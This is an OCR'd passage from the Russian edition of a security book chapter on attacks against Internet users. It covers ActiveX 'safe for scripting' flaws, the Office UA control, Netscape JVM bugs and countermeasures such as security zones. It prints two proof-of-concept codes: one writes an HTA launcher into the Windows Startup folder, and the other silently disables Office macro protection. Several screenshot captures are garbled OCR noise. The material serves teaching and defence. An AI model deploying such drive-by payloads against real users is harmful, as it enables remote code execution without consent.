Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
Летом 1999 года Георгий
Гунински
(Georgi
Guninski)
и Ричард М. Смит (Richard
М. Smith) (и не только они) независимо обнаружили два различных изъяна в методе
обработки элементов ActiveX броузером Internet Explorer. Установив для элементов
управления флаг "safe for scripting" ("помечен как безопасный"), их разработчики
могут полностью обойти обычную процедуру проверки сертификатов Authenticode.
В
качестве примеров таких элементов ActiveX можно привести
Scriptlet.
typelib
и
Eyedog.
OCX, предназначенные для использования в IE4 и более ранних версиях. Если
для этих элементов управления установлен флаг "safe for scripting", то при их запуске
в броузере на экран не будет выводиться никаких сообщений.
Возможно, не стоит волноваться по поводу элементов управления ActiveX, выполняю-
щих
безобидные функции, однако
и
Scriptlet,
и
Eyedog
имеют доступ
к
файловой
сис-
теме пользователя. Элемент
Scriptlet. typelib
позволяет создавать, редактировать
и пе-
резаписывать файлы, хранящиеся на локальном диске, a Eyedog — обращаться к систем-
ному реестру и осуществлять сбор информации о технических параметрах компьютера.
Георгий Гунински написал проверочный
код для
элемента управления
Scriptlet,
который помещает в каталог Startup удаленного компьютера исполняемый тексто-
вый файл с расширением
.НТА
(приложение HTML — HTML Application). При сле-
дующей перезагрузке системы этот файл выполняется, и на экране отображается без-
обидное сообщение от Георгия. Однако это не уменьшает серьезности положения:
просто посетив страницу Георгия
http://www.guninski.com/scrtlb.html,
вы, тем
самым, позволяете ему выполнить на своем компьютере любой код. Вот и все. Ниже
приведен код, реализующий данную идею.
<object
id="scr"
classid="clsid:06290BD5-48AA-llD2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start
Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object
id='wsh'
classid='clsid:F935DC22-1CFO-11DO-ADB9-
OOC04FD58AOB'></object><SCRIPT>alert('Written
by Georgi Guninski
http://www.guninski.com/~joro');wsh.Run('c:\\command.com');</
"+
"SCRIPT>";
scr.write();
</SCRIPT>
</object>
Этот изъян программных интерфейсов, позволяющий получить к ним доступ, Ричард
М. Смит (Richard M. Smith) назвал "случайным троянским конем". Установленные на же-
сткий диск многих пользователей вместе с таким популярными приложениями, как IE,
данные элементы управления ActiveX ожидают, пока кто-нибудь не установит с ними уда-
ленное
соединение(http://www.cnn.com/TECH/computing/9909/06/activex.idg).
Масштабы потенциального воздействия могут быть устрашающими. Чтобы устано-
вить флаг "safe for scripting" для элемента управления ActiveX, нужно либо реализо-
вать в них интерфейс
lObjectSafety,
либо пометить их как безопасные. Для этого в
системном реестре в параметр Implemented Categories, соответствующий данному
элементу управления, необходимо добавить параметр 7DD95801-9882-11CF-9FA9-
ООАА006С42С4
(http://msdn.microsoft.com/workshop/components/activex/safety.
asp). Зачастую в системном реестре Windows находится несколько десятков таких
элементов управления. Для подобных атак могут быть использованы те из них, кото-
рые могут выполнять действия с повышенными привилегиями (например, запись на
диск или запуск кода).
Глава 16. Атаки на пользователей Internet 645
Есть несколько способов, позволяющих определить, какие из элементов управле-
ния активно используются системой. Для обычного просмотра активных приложений
СОМ (включая элементы управления ActiveX), установленных на компьютере, щелк-
ните на кнопке Start, выберите команду Run и введите dcomcnfg. При этом на экране
появится диалоговое окно, представленное на следующем рисунке.
Ай**6от
|0е1»д
Properties
|
DeloJSaail»!
Dofsu»
PirtooA
|
юсш
01
с-одао-оош-сооо-оюоооашв
{11ВСЭ1FE-1018-1101
-8663-0060S764165А)
{6316ВЭ24-223Э-1
П
1В-Ж66-0(ЙАШЗВАЭ05)
Acrobat
Capture
Automation
Server
AcroOisrX
AcroExcKMatrH
AcroExckPDBookmark
Active
Messaging
Session
Object
Adobe Photoshop Image
APE Client
APE
Expediter
APE Instance
Manager
APE
Job
Manager
APE Logger
APE Manager
APE Pool
Manager
APE Server Manager
APE Worker
APE
Worker
Provtfer
Properties...
Cancel
|
Чтобы посмотреть, имеются ли среди этих объектов помеченные как "safe for scripting",
воспользуйтесь утилитой oleview из набора NT Resource Kit (ее более новая версия вхо-
дит в среду разработки приложений Visual Studio компании Microsoft). Утилита oleview
позволяет просмотреть все зарегистрированные в системе объекты
COM/ActiveX.
Кроме
того, она выводит их идентификатор класса (CLSID — Class ID), содержащийся в систем-
ном реестре, и многие важные параметры из поддерева Implemented Categories сис-
темного реестра. Диалоговое окно утилиты oleview показано на следующем рисунке.
Эе
Object
yim
H*
SJ
Ч>
DatanangeHeac-J
agSOalaCtlClass
-
1
Zl-Ш
DataFormWizardS
>1
Я
DBGrid
Control
ffl Ф *vSofl Inc. • ICK
3
*Ё
devSolt Inc. - ICK
3 В DHTML Edit
Cont
а ЙЩЕИШЕЯ
a«tx
DK
Control
EB-*ONSAclive-XCor
ф-Ej!
DSOisplayPanel
С
3
ii
DTC
Designer
S
EllectBvr
Dass
A
гяаа.
ln«fementation|
Adrvation|
CLSID
-(009541A4.38ei-lOlC-32F3434022400SC02}
(2D360201-FFF5-11D1-9003-OOAOC953BC(W
=
D
Control
Implemented Categories
(7DD35801
-9882-1
lCF-3fA9-OOM006C42C4)
(70D968(K-98a2-11CF-9FA9-OOAA006C42C4)
lnprocServer32
(<no
name>l
=
CAProgram
Fies^Co
nprocServer32
[ThresdingModel]
-Apartment
I
""
c
.....
""
i
^J
f
|
_|
J
Не**.
Кроме того, утилита oleview отображает интерфейсы, экспортируемые объектами.
Это помогает понять, является ли данный объект хорошей целью для взломщика, за-
хват которой позволит выполнить операции с повышенными привилегиями.
Вполне закономерно, что почти год спустя хакером DilDog из группы Cult of the
Dead Cow (см. главу 4 о знаменитом программном продукте Back Orifice) был обнару-
жен еще один подобный элемент управления под именем Office 2000 UA (OUA). Он
регистрируется системой во время установки компонентов Microsoft Office. Для дока-
646
Часть IV.
Хакинг
программного обеспечения
зательства
своей концепции хакер
DilDog
создал Web-страницу
(http://www.atstake.
com/research/advisories/2000/ouahack/index.html),
посредством которой
можно удаленно инстанцировать элемент OUA, установленный в системе пользовате-
ля, а затем с его помощью отключить защиту от вирусов в макросах документов Office
без предупреждения пользователя. Далее с этой страницы загружается файл с именем
evil.doc, в котором содержится простой макрос, создающий файл
C:\dildog-was-
here.
txt.
Удаленное инстанцирование
OUA
осуществляется
с
помощью следующего
кода, внедренного на Web-странице.
var ua;
function
setup()
{
// Создание элемента UA
ua = new
ActiveXObject("OUACtrl.OUACtrl.1");
// Присоединение объекта ua к объекту ppt
ua.WndClass="OpusApp";
ua.OfficeApp=0;
// Проверка того, что объекты UA "видят" приложение Office
return
ua.IsAppRunning();
}
function
disablemacroprotection()
{
var
ret;
// Активизация приложения
ua.AppActivate();
// Отображение диалогового окна защиты макросов
ua.ShowDialog(OxOE2B);
// Щелчок на кнопке
4ow'
ua.SelectTabSDM(Ox!3);
// Щелчок на кнопке
4
ok'
ua.SelectTabSDM(l);
}
function
enablemacroprotection()
{
// Активизация приложения
ua.AppActivate();
// Отображение диалогового окна защиты макросов
ua.ShowDialog(ОхОЕ2В);
// Щелчок на кнопке
'medium'
ua.SelectTabSDM(0x12);
// Щелчок на кнопке
v
ok'
ua.SelectTabSDM(1);
}
// Начало выполнения сценария
if(setupO) {
disablemacroprotection()
;
parent.frames["blank"].location="
}
</script>
</body>
</html>
Глава 16. Атаки на пользователей Internet 647
Элементы управления, помеченные как "safe for scripting", могут вызываться
также из электронных сообщений в формате HTML. В этом случае их гораздо
легче разместить в нужном месте, поэтому они могут быть более опасны. По-
добные "бомбы" обсуждаются в следующих разделах, посвященных
хакингу
через электронную почту.
^
Озащита от использования флага "safe for
scripting"
Для защиты от этих серьезных изъянов пользователям Internet можно предложить
три метода. Мы рекомендуем воспользоваться всеми тремя способами.
Во-первых, установите все имеющиеся модули обновления. Их можно найти по
адресу
http://www.microsoft.com/technet/security/bulletin/ms99-032.asp
и
http://office.microsoft.eom/downloads/2000//Uactlsec.aspx.
Однако: не забы-
вайте о том, что это лишь локальное решение проблемы: при использовании этих моду-
лей обновления флаг "safe for scripting" будет изменен только для конкретных элементов
управления. Они не обеспечивают глобальной защиты от любых атак, основанных на
применении других элементов управления, помеченных как безопасные. Мы еще не до
конца обсудили "случайных троянских коней" и вернемся к этому немного позже.
Вторая контрмера направлена исключительно против элемента OUA и ему подоб-
ных, использующих для выполнения своей грязной работы макросы Office. В Office
2000 установите самый высокий уровень защиты макросов (High), выбрав команду
Tools^Macro^Security
(таким образом необходимо настроить каждое приложение в
отдельности, поскольку это нельзя сделать глобально).
Третья и наиболее эффективная контрмера заключается в ограничении использо-
вания или полном отключении элементов управления ActiveX. О том как это сделать,
рассказывается в разделе, посвященном зонам безопасности. Но перед этим следует
уделить внимание еще одному изъяну, связанному с элементами ActiveX.
Разработчикам можно посоветовать, чтобы они не устанавливали флаг "safe for
scripting" для тех элементов управления, которые выполняют в пользовательской сис-
теме действия с высокими привилегиями. Конечно, это касается только тех, кто не
хочет превзойти Георгия
Гунински.
После инстанцирования элементы управления ActiveX остаются в памяти до
тех пор, пока не будут выгружены. Для этого в командной строке нужно ввести
команду
regsvr32 /u
1Имя__элемента].
•;•."
Активная загрузка файлов
Популярность
Простота
Опасность
Степень риска
5
8
5
6
Независимый исследователь проблем безопасности Хуан Карлос Гарсия
Квартанго
(Juan Carlos Garcia
Cuartango),
внимание которого особенно привлекает броузер Internet
Explorer, поместил на своем Web-узле
(http://www.kriptopolis.com)
информацион-
ное сообщение об одном из его изъянов. Это оказалось настолько важным, что сообще-
ние было переведено на английский язык (тогда как остальная информация узла была
представлена на испанском). Суть изъяна заключается в возможности генерирования
состояния отказа в обслуживании (DoS — Denial of Service), если для загрузки файлов с
648 Часть IV. Хакинг программного обеспечения
расширением . CAB, имеющих сертификат компании Microsoft, используется элемент
управления ActiveX. При этом файлы загружаются в любое указанное место диска, даже
если для этого необходимо записать их поверх других файлов.
О Контрмеры
Компания Microsoft выпустила соответствующий модуль обновления, который
можно найти по адресу http://www.microsoft.com/technet/security/bulletin/
MSOO-042
.asp).
"
В системе Windows 2000 защиту определенных системных файлов от переза-
писи обеспечивает служба WFP (Windows File Protection).
Разумное использование зон безопасности:
общее решение проблемы элементов ActiveX
Возможно, к этому моменту многие читатели пришли к выводу, что элементы управ-
ления ActiveX стали проклятием клиентов Internet, нарушающим спокойствие и безо-
пасность пользователей. Такое мнение не учитывает основную закономерность: чем бо-
лее мощной и распространенной становится технология, тем больший потенциал в ней
заключен. И этот изъян способен привести к различным, в том числе и к разрушитель-
ным последствиям. Элементы управления ActiveX — мощная и популярная технология;
поэтому она может принести большой вред, если служит злонамеренным целям (более
полно возможности ActiveX раскрыты в последующих разделах, где рассказывается о ха-
кинге
электронной почты). Конечные пользователи всегда стремятся к автоматизации
выполнения своих повседневных задач, и элементы ActiveX — это один из инструмен-
тов, который способен удовлетворить эти потребности. Можно просто закрыть глаза и
надеяться, что на сегодня все обойдется, а потом на смену этому программному обеспе-
чению придет новое. Однако это далеко не лучший выход. Новые технологии, находя-
щиеся где-то за горизонтом, скорее всего, будут таить в себе примерно те же опасности.
Общим решением проблемы, связанной с элементами управления ActiveX (не
важно, связана ли она с использованием флага "safe for scripting"), является ограниче-
ние их возможности осуществлять над системой привилегированный контроль. Для
этого требуется определенное понимание одного из наиболее значительных аспектов
обеспечения безопасности системы Windows — зон безопасности (security zone). По-
этому для повышения степени защиты необходимо научиться правильно их использо-
вать. По существу, модель зон безопасности позволяет определять разные уровни до-
верия для кода, загружаемого из одной из четырех зон: Local Intranet (Местная
интра-
сеть), Trusted Sites (Надежные узлы), Internet (Зона Internet) и Restricted Sites (Ограни-
ченные узлы). Существует еще пятая зона, которая называется Local Machine
(Локальная машина), однако в пользовательском интерфейсе она недоступна, настро-
ить ее можно только с помощью средств администрирования IEAK (IE Administration
Kit)
(http:
//www.
microsoft.
com/windows/ieak/en/default,
asp).
I Одной из лучших ссылок по этой теме является статья
Q174360
из базы зна-
ний
компании
Microsoft
(http://support.microsoft.com).
Там вы
найдете
много ценной информации о зонах безопасности.
В любую зону, за исключением зоны Internet, узлы можно добавлять вручную. В зо-
не Internet содержатся все узлы, не включенные в любую другую зону, а также те уз-
лы, в URL-адресе которых содержится символ точки (.). (Например, узел
http:
//local
по
умолчанию входит
в
местную зону, тогда
как
узел
http:
//www.
Глава 16. Атаки на пользователей Internet 649
microsoft.com
находится в зоне Internet, поскольку в его адресе
встречаются
точки.)
При посещении узла, входящего в какую-то зону, активизируются соответствующие
ей параметры безопасности (например, в зависимости от этого возможность запуска
элементов управления ActiveX может быть разрешена или запрещена).
Поэтому
очень
важно правильно настроить зону Internet, поскольку по умолчанию к ней относятся
все посещаемые пользователями узлы. Конечно, если вручную добавить узел в другую
зону, то на него это правило распространяться уже не будет. При перемещении узлов
из одной зоны в другую будьте очень внимательны (в корпоративных локальных сетях
наполнение других зон обычно производится администраторами этих сетей).
Чтобы настроить параметры безопасности зоны Internet, выберите в броузере In-
ternet Explorer команду
Tools
о
Internet Options и перейдите во вкладку Security (или за-
пустите
аплет
Internet Options панели управления). Затем выберите элемент Internet
zone и задайте требуемый уровень безопасности. Мы рекомендуем установить уровень
безопасности High, а затем вручную настроить несколько других параметров, как по-
казано в табл.
16.1.
Таблица 16.1. Рекомендуемые параметры безопасности ЗОНУ Internet
Я
•
v
(настройки уровня Custom
Level
нужно выполнять после
того,
;;
•:.-•;•-,:д-;
;
как по
умолчанию задан уровень безопасности
High)
Категория Имя параметра Рекомендуемое
значение
Комментарий
ActiveX controls and
plug-ins (элементы
ActiveX и модули под-
ключения)
Cookies (файлы
"cookie")
Downloads (загрузка)
Scripting (сценарии)
Script ActiveX con-
trols marked as safe
for scripting
(выполнять сценарии
элементов управления
ActiveX, помеченных
как безопасные)
Allow per-session
cookies (not stored)
(позволить использо-
вание cookies в тече-
ние одного сеанса (без
сохранения))
File download
(загрузка файла)
Active scripting
(активные сценарии)
Disable (отключить)
Enable
(использовать)
Enable
(использовать)
Enable
(использовать)
Элементы управления,
содержащиеся на кли-
ентском компьютере,
могут использоваться в
злонамеренных целях
Менее безопасный ре-
жим, однако в то же вре-
мя более дружественный
для пользователя
Броузер IE, основываясь
на расширении, будет
автоматически предла-
гать загрузку файла
Менее безопасный ре-
жим, однако в то же вре-
мя более дружественный
для пользователя
Параметры, позволяющие запретить использование элементов управления ActiveX,
показаны на рис. 16.1.
650
Часть IV. Хакинг программного обеспечения
о о
Internet
Local
intranet
Trusted
sites
Restricted
sites
Internet
4
/,V&№
Uh
ThB
icnecortent
aiWsb
tiietyou
"''
Eihav№l
pieced
rirth»
гоп«
-
*
,
,-SewHW
Settings:
О Prompt
Initialize
and
script
ActiveX
controls
not marked as
s
© Disable
О Enable
О Piompt
j]
Run
ActiveX
controls end
plug-ins
О Administrator approved
© Disable
О ЕпаЫе
О Prompt
Script
ActrveX
controls marked safe for
seating
0
Disabb
О Enable
О Pmmnr
I
-
1
-ll
- Reset
custom
*eejng«~^t
Beset
to:
Л/с.
7(5.1.
Отключение элементов управления ActiveX с помощью
аплета
Internet
Options панели управления позволит защитить систему от за-
грузки вредоносных
элементов
управления с враждебных Web-страниц
Отключение элементов управления ActiveX может сказаться на возможности про-
смотра узлов, на которых отображение различных спецэффектов основано на этих
элементах. На заре развития Web динамическая работа многих узлов в значительной
степени зависела от загружаемого кода, в том числе и от элементов ActiveX. К сча-
стью, в настоящее время эта парадигма все больше вытесняется расширениями языка
HTML и сценариями, выполняющимися на сервере. Поэтому при работе с большин-
ством узлов отключение элементов ActiveX не приведет к возникновению проблем,
как это было раньше. Очевидным исключением из этого правила являются узлы, на
которых используются элементы управления Shockwave компании Macromedia. При
попытке просмотра таких узлов на экране появится следующее сообщение.
An
ActiveX
control
on
th«
page
ts
not
(ate.
Yout
ctrtent
iecutSy
tettngs
ptohibit
nmning
unsafe
cootiofe
on
thb
page.
As a
result,
this
page
may
not
cfcplay
as
attended,
Если вы все же хотите воспользоваться преимуществами звуковых и анимацион-
ных эффектов, обеспечиваемых элементами Shockwave, придется допустить использо-
вание элементов ActiveX (конечно, если не задействован броузер Netscape, в котором
элементы Shockwave используются в качестве подключаемых модулей).
Другим ориентированным на элементы ActiveX узлом, который посещается мно-
гими пользователями, является узел Windows Update компании Microsoft (WU), на ко-
тором элементы ActiveX используются для сканирования компьютера пользователя, а
также для загрузки и установки нужных модулей дополнения. Этот Web-узел оказался
Глава 16. Атаки на пользователей Internet
651
удачной идеей. Он позволяет сэкономить огромное количество времени, требуемого
для поисков отдельных модулей обновления (что особенно важно для обеспечения
безопасности!),
и автоматически определить, была ли ранее установлена правильная
версия. Однако мы не думаем, что из-за одного узла, предоставляющего такие воз-
можности, стоит полностью разрешать использование элементов управления ActiveX.
Еще хуже то, что после запрещения использования элементов ActiveX в броузере In-
ternet Explorer нельзя воспользоваться механизмом автоматического поиска адреса по
фрагменту URL, введенному в строке адреса (например, когда по подстроке
трЗ
тре-
буется найти узел
http:
//www.
трЗ .
com).
Одно из возможных решений этой проблемы заключается в ручном включении ре-
жима применения элементов ActiveX во время посещения надежного узла. Затем его
придется отключить, и снова вручную. Разумнее занести эти узлы в зону надежных уз-
лов. Присвойте этой зоне более низкий уровень безопасности (рекомендуется Medium
(Средний)),
а затем добавьте в нее надежные узлы, например
WU
(windowsupdate.
microsoft.
com). Таким образом, при посещении узла
WU
будут применяться менее
жесткие параметры безопасности, и будут доступны возможности узла, связанные с ис-
пользованием элементов ActiveX. Аналогично, добавление в зону Trusted Sites узла
auto.search.msn.com
позволит задать соответствующие параметры безопасности, позво-
ляющие осуществлять поиск по содержимому адресной строки. Удобно, не правда ли?
| Соблюдайте осторожность и добавляйте в зону надежных узлов только те из
них, которые пользуются высокой степенью доверия, поскольку к ним будет
применяться меньше ограничений, связанных с загрузкой их активного содер-
жимого и запуском. Следует иметь в виду, что даже респектабельный Web-
узел может быть взломан хакерами-злоумышленниками, или в группе его раз-
работчиков может оказаться негодяй, охотящийся за данными пользователей
(а возможны и худшие варианты).
Для безопасного чтения электронных сообщений приложения Outlook и Outlook
Express можно настроить так, чтобы в них тоже учитывались зоны безопасности. Па-
раметры Outlook и Outlook Express позволяют выбрать зону, уровень безопасности ко-
торой будет использоваться при обработке содержимого, отображаемого почтовой
программой. Имеется две возможности: Internet и Restricted Sites. Конечно же, реко-
мендуется выбрать зону ограниченных узлов (новый модуль Outlook 2000 Security Up-
date выполняет эту установку самостоятельно). Убедитесь в том, что в параметрах зо-
ны Restricted Sites полностью отключены все категории активного содержимого! Для
этого установите уровень безопасности High, а затем задайте режим Custom Level и от-
ключите все режимы, которые остались включенными (если их
отключить
нельзя, ус-
тановите переключатель в положение, соответствующее наивысшему уровню безопас-
ности). Процесс настройки зоны Restricted Sites в Outlook показан на рис. 16.2.
Как и в Internet Explorer, в Outlook можно смягчить самые сильные ограничения.
Однако в электронных сообщениях активное содержимое встречается реже, чем на
Web-страницах. Поэтому предупреждающие сообщения о них доставляют меньше
беспокойства. Однако в этом случае опасность, возникающая в процессе интерпрета-
ции сообщения, намного превышает преимущества его эстетического восприятия. Чи-
тателям, которые не доверяют этому утверждению, рекомендуется дочитать главу до
конца. Замечательной особенностью зон безопасности является то, что с их помощью
можно заставить Outlook вести себя более консервативно, чем Web-броузер. Гибкость
программного обеспечения и умение правильно пользоваться его параметрами приве-
дет к повышению безопасности.
652 Часть IV.
Хакинг
программного обеспечения
Preferences
j
Mai
Services
|
MaH
Format
|
Spelng
Security
|
«her
|
petegates
j
Security
zones
alow
you
to
customize
«hither
scripts
and
«cttve
content
can
be
run
eit-fTML
messages.
Sefect
the
Microsoft
Internet
Exptorer
security
zqne
to
use,
'
'
;;
2.°°"
]O
Restricted
sites
JJ
|^
AttaiJTmerttSeuirftv.., |
Digital
IDs
(Cwtftcet«>
-
*•
'.----
~
-
Pj~1
ИдЫ
IDs
or
Certtftates
are
dooments
ttrgt
aluw
you
to
prove
your
t
JM
kterttyhetedronctraniactrarB.
/
'
'
iFTpcrt/ExportDKFtatIC'...
I
(^C
eDigtafID.,!
{
Puc.
16.2.
Параметры безопасности зоны Re-
stricted Sites в Outlook
Изъяны в системе защиты Java
В 1990 году компания Sun Microsystems решила создать парадигму программирова-
ния, которая помогла бы решить многие проблемы разработки программ, стоящие
перед их создателями еще со времен зарождения вычислительной техники. В резуль-
тате одним выстрелом удалось убить двух зайцев: создать новый язык Java и попутно
решить многие традиционные проблемы обеспечения безопасности. Большинство лю-
дей полагают, что язык Java безопасен на все 100%, поскольку с самого начала был
задуман как нечто исключительное. Это мнение в значительной мере подкрепляется
маркетинговой политикой компании Sun. Конечно же, обеспечить абсолютную безо-
пасность невозможно. Однако пути ее повышения, применяемые в Java, несомненно,
представляют определенный интерес. (Ниже будет рассмотрена архитектура Java 2,
или
JDK
1.2, которая в момент написания книги являлась текущей.)
Java — тщательно продуманный язык, позволяющий программистам избежать
многих ошибок, которые могут привести к таким проблемам безопасности, как пере-
полнение буфера. На этапе компиляции и выполнения виртуальной машиной Java
(JVM — Java Virtual Machine) и встроенным механизмом проверки байт-кода осущест-
вляется строгий контроль типов, что помогает защитить используемые программой
области памяти. Кроме того, в языке Java не поддерживается прямой доступ к памяти
и манипуляция ею с помощью указателей, позволяющих программисту управлять ис-
пользованием и загрузкой кода.
Кроме того, в
JVM
есть встроенный диспетчер безопасности (Security Manager),
выполняющий контроль доступа к системным ресурсам. Его работа основана на поли-
тике безопасности, задаваемой пользователем. Наряду с проверкой типов эти концеп-
ции создают ограничительный барьер, не позволяющий коду Java выполнять приви-
легированные действия без явного согласия пользователя. В дополнение ко всему
вышесказанному язык Java позволяет использовать сертификаты, определяющие сте-
пень "надежности" загруженного извне кода или доверия к нему. Основываясь на
своем доверии к данному сертификату, пользователь принимает решение, запускать
данный код или нет (что во многом напоминает работу
Authenticode).
Глава 16. Атаки на пользователей Internet
653
И наконец, спецификация Java, с которой без проблем можно познакомиться по
адресу
http://java.sun.com,
открыта для широкой общественности. Очевидно, та-
кая открытость для критики и анализа приводит к естественному отбору и избавле-
нию от различных недостатков.
Теоретически эти механизмы преодолеть крайне сложно (фактически для многих
из них имеется формальное доказательство их безопасности). Однако на практике ме-
ханизмы безопасности Java были взломаны много раз. Это произошло по той же хо-
рошо известной причине, которая заключается в том, что в процессе реализации на-
рушаются принципы, заложенные при проектировании. Хороший обзор, посвящен-
ный истории развития механизмов обеспечения безопасности в Java, можно найти на
Web-странице Secure Internet Programming Принстонского университета, расположен-
ной по адресу http://www.cs.princeton.edu/sip/history/index.php3. В после-
дующих разделах описываются основные проблемы последних реализаций Java, пре-
доставляющие наибольший интерес для пользователей клиентских приложений.
Подробные сведения о средствах обеспечения безопасности в Java можно
получить на Web-узле
http://java.sun.com/sfaq/index.htinl,
где
со-
держатся ответы на часто задаваемые вопросы по этой теме.
•Д-."
Ошибки JVM броузера Netscape Communicator
Популярность
Простота
Опасность
Степень риска
4
1
7
4
В апреле 1999 года сотрудник Марбургского университета (Германия)
Карстен
Зор
(Karsten
Sohr) обнаружил изъян важного компонента безопасности
JVM
броузера
Netscape Communicator. При определенных обстоятельствах виртуальная
машина
Java
не проверяет загружаемый в нее код. Использование этого изъяна позволяет взлом-
щику запустить код, разрушающий механизмы проверки типов Java, и реализовать
взлом со смешением типов (type confusion attack). Это классический пример отступле-
ния реализации от первоначального замысла.
О Отключение Java в броузере Netscape
Обновите текущую версию Netscape, или отключите Java, выполнив следующие
действия (рис. 16.3).
1. В программе Communicator выберите команду
Edit^Preferences.
2. В появившемся диалоговом окне Preferences выберите категорию
Advanced.
3. В этом же диалоговом окне сбросьте флажок Enable Java.
4. Щелкните на кнопке ОК.
Авторы считают, что возможность использования сценариев JavaScript можно оста-
вить включенной. К тому же в настоящее время сценарии JavaScript настолько интен-
сивно используются Web-узлами, что от них практически невозможно отказаться. Од-
нако мы настоятельно рекомендуем отключить возможность применения JavaScript в
почтовом клиенте и приложении чтения новостей программы Netscape, как это пока-
зано
на
рис. 16.3. Более подробную информацию по этим вопросам можно найти по
адресу
http://www.netscape.com/security/notes/sohrjava.html.
654 Часть IV.
Хакинг
программного обеспечения